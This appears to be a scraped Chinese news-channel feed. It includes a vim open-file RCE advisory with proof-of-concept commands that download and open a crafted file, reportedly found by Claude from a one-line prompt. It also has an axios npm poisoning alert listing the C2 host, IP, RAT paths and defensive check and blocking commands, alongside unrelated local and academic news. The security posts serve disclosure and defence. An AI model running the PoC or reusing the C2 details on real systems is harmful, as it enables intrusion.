完美做了换弹版本更新的例行问卷,感兴趣的可以自己填一下:
https://surveys.pwesports.cn/survey/FCQzOa
https://surveys.pwesports.cn/survey/FCQzOa
vim存在rce,打开文件即可触发
https://github.com/vim/vim/security/advisories/GHSA-2gmj-rpqf-pxvh
poc
漏洞还是claude发现的,prompt只有一句话
https://github.com/vim/vim/security/advisories/GHSA-2gmj-rpqf-pxvh
poc
vim -version
# VIM - Vi IMproved 9.2 (2026 Feb 14, compiled Mar 25 2026 22:04:13)
wget https://raw.githubusercontent.com/califio/publications/refs/heads/main/MADBugs/vim-vs-emacs-vs-claude/vim.md
vim vim.md
cat /tmp/calif-vim-rce-poc漏洞还是claude发现的,prompt只有一句话
Somebody told me there is an RCE 0-day when you open a file. Find it.
GitHub
Vim tabpanel modeline escape affects Vim > 9.1.1390 && Vim < 9.2.0272
Vim tabpanel modeline escape affects Vim > 9.1.1391 && Vim < 9.2.0272
===================================================
Date: 30.03.2026
Severity: High
CVE: *not-yet-assigned*
...
===================================================
Date: 30.03.2026
Severity: High
CVE: *not-yet-assigned*
...
严重供应链攻击,axios 两个版本被投毒。
核心信息
你需要做的
1. 立即检查
• 降级到安全版本:
• 系统已受陷 → 从干净状态重建,轮换所有凭证(npm token、AWS 密钥、SSH、云凭证)
• 检查 RAT 持久化文件(见上表路径)
3. CI/CD 加固
axios 周下载量 3 亿+,影响范围极大。检查完你的项目和CI/CD流水线。
核心信息
| 项目 | 内容 |
| ---------- | ----------------------------------------------------------------------------------------------- |
| 恶意版本 | axios@1.14.1 和 axios@0.30.4 |
| 攻击手法 | 劫持维护者 jasonsaayman 的 npm 账户,绕过 CI/CD 直接发布 |
| 恶意依赖 | plain-crypto-js@4.2.1(伪装成 crypto-js,实际 drop RAT) |
| C2 服务器 | sfrclak.com:8000 (IP: 142.11.206.73) |
| 平台 payload | macOS: /Library/Caches/com.apple.act.mond<br>Linux: /tmp/ld.py<br>Windows: %PROGRAMDATA%\wt.exe |
你需要做的
1. 立即检查
npm list axios 2>/dev/null | grep -E "1\.14\.1|0\.30\.4"
ls node_modules/plain-crypto-js 2>/dev/null && echo "⚠️ 中招"
• 降级到安全版本:
[email protected] 或 [email protected]• 系统已受陷 → 从干净状态重建,轮换所有凭证(npm token、AWS 密钥、SSH、云凭证)
• 检查 RAT 持久化文件(见上表路径)
3. CI/CD 加固
npm ci --ignore-scripts # 禁止 postinstall 脚本
iptables -A OUTPUT -d 142.11.206.73 -j DROP # 屏蔽 C2
axios 周下载量 3 亿+,影响范围极大。检查完你的项目和CI/CD流水线。
公益短信:警惕“谷圈”交易陷阱!购买二次元周边产品(俗称“谷子”)时,请理性消费、适度热爱,切勿因攀比或沉迷陷入诈骗陷阱。骗子常伪装卖家或拼单团长,以限量拼团预售、高价收谷、稀有低价售卖等名义,诱骗私下转账后卷款失联或发送假冒周边、虚假物流。警方对涉“谷圈”诈骗行为零容忍,将依法严厉打击!请广大青少年切勿轻信低价诱惑,拒绝私下联系转账,认准正规平台交易。【山东省反诈骗中心】
山东省设立中小学春秋假期
日前,山东省教育厅等13部门联合印发通知,部署设立中小学(含中职学校)春秋假,引导学生走出校园,在春光秋色中感受自然,在社会实践中丰富阅历,促进身心健康成长。鼓励各地幼儿园和高中阶段学校参照执行。
每年设置春假、秋假各一次,原则上每次3天,安排在每学期期中前后。鼓励将春秋假与双休日、法定节假日衔接,形成较长时间假期;也可与学校组织的研学实践、运动会、劳动周等活动统筹安排。具体放假时间,由各市充分考虑本地气候条件、生产安排和学年度教学实际等研究确定,并根据实施情况动态优化调整。
春秋假占用的教学时间,主要通过统筹利用日常机动教学时间等方式补回,确保每学期教学时间总量不变、国家规定教学任务全面完成。
各中小学校要加强学生春秋假期生活指导,鼓励学生多参与贴近自然、贴近生活的社会实践活动。春秋假期间,学校和教师不得以任何形式布置任何作业,不得组织线上或线下授课、补习、考试,或利用其他方式变相组织集体补课。严肃查处春秋假期间面向中小学生的违规学科类培训活动。
https://mp.weixin.qq.com/s/wnxWn6DL2jwTxPXE8AR7Ig
日前,山东省教育厅等13部门联合印发通知,部署设立中小学(含中职学校)春秋假,引导学生走出校园,在春光秋色中感受自然,在社会实践中丰富阅历,促进身心健康成长。鼓励各地幼儿园和高中阶段学校参照执行。
每年设置春假、秋假各一次,原则上每次3天,安排在每学期期中前后。鼓励将春秋假与双休日、法定节假日衔接,形成较长时间假期;也可与学校组织的研学实践、运动会、劳动周等活动统筹安排。具体放假时间,由各市充分考虑本地气候条件、生产安排和学年度教学实际等研究确定,并根据实施情况动态优化调整。
春秋假占用的教学时间,主要通过统筹利用日常机动教学时间等方式补回,确保每学期教学时间总量不变、国家规定教学任务全面完成。
各中小学校要加强学生春秋假期生活指导,鼓励学生多参与贴近自然、贴近生活的社会实践活动。春秋假期间,学校和教师不得以任何形式布置任何作业,不得组织线上或线下授课、补习、考试,或利用其他方式变相组织集体补课。严肃查处春秋假期间面向中小学生的违规学科类培训活动。
https://mp.weixin.qq.com/s/wnxWn6DL2jwTxPXE8AR7Ig
中国计算机学会注意到,NeurIPS 基金会在社交平台 X 及NeurIPS 2026官网上,就 NeurIPS 2026 会议限制部分受制裁机构投稿一事发布了解释与更正。中国计算机学会欢迎 NeurIPS 的投稿政策回归国际学术交流的通行做法。
中国计算机学会始终倡导在开放、公平的环境下开展国际学术交流,鼓励中国学术界积极参与包括NeurIPS在内的国际学术交流与合作,同时将积极推进学会自主和开放的国际学术交流平台的建设与发展。
https://www.ccf.org.cn/Media_list/ccf/2026-03-30/869614.shtml
中国计算机学会始终倡导在开放、公平的环境下开展国际学术交流,鼓励中国学术界积极参与包括NeurIPS在内的国际学术交流与合作,同时将积极推进学会自主和开放的国际学术交流平台的建设与发展。
https://www.ccf.org.cn/Media_list/ccf/2026-03-30/869614.shtml
招行下架明日方舟等借记卡卡面
近数月以来,招商银行已下架皮卡丘、萌气(猫爪、浅夏倚梦、春日萌动)等多款借记卡卡面。近日,招行已下架明日方舟联名卡面(阿米娅、罗德岛)。
上述下架卡面无法网申,可能无法保留卡面换同卡号卡片。若线下仍有卡板,目前仍可线下开预制卡或换号换卡。
截至发稿时,哔哩哔哩2233花嫁、Hello Kitty、愤怒的小鸟、宠物(猫咪、狗狗)、海绵宝宝等卡面仍可办理。
#招商
近数月以来,招商银行已下架皮卡丘、萌气(猫爪、浅夏倚梦、春日萌动)等多款借记卡卡面。近日,招行已下架明日方舟联名卡面(阿米娅、罗德岛)。
上述下架卡面无法网申,可能无法保留卡面换同卡号卡片。若线下仍有卡板,目前仍可线下开预制卡或换号换卡。
截至发稿时,哔哩哔哩2233花嫁、Hello Kitty、愤怒的小鸟、宠物(猫咪、狗狗)、海绵宝宝等卡面仍可办理。
#招商
对于Google的 ICLR 2026 TurboQuant 论文,我们必须公开澄清
https://zhuanlan.zhihu.com/p/2020969476166808284
Google Research 于2026年1月被 ICLR 2026 会议接收的论文 ”TurboQuant: Online Vector Quantization with Near-optimal Distortion Rate“ 中,有关已有的 RaBitQ 向量量化算法的描述,理论结果对比,实验对比均存在严重问题(详细情况后文会展开描述)。这些问题在论文投稿至 ICLR 2026 前已被我们通过邮件明确指出,TurboQuant 团队也明确表示已知情,但选择了不予修正。论文随后被 ICLR 2026 会议接收,然后通过 Google 官方渠道大规模推广,在社交媒体浏览量已达到数千万次。
https://zhuanlan.zhihu.com/p/2020969476166808284
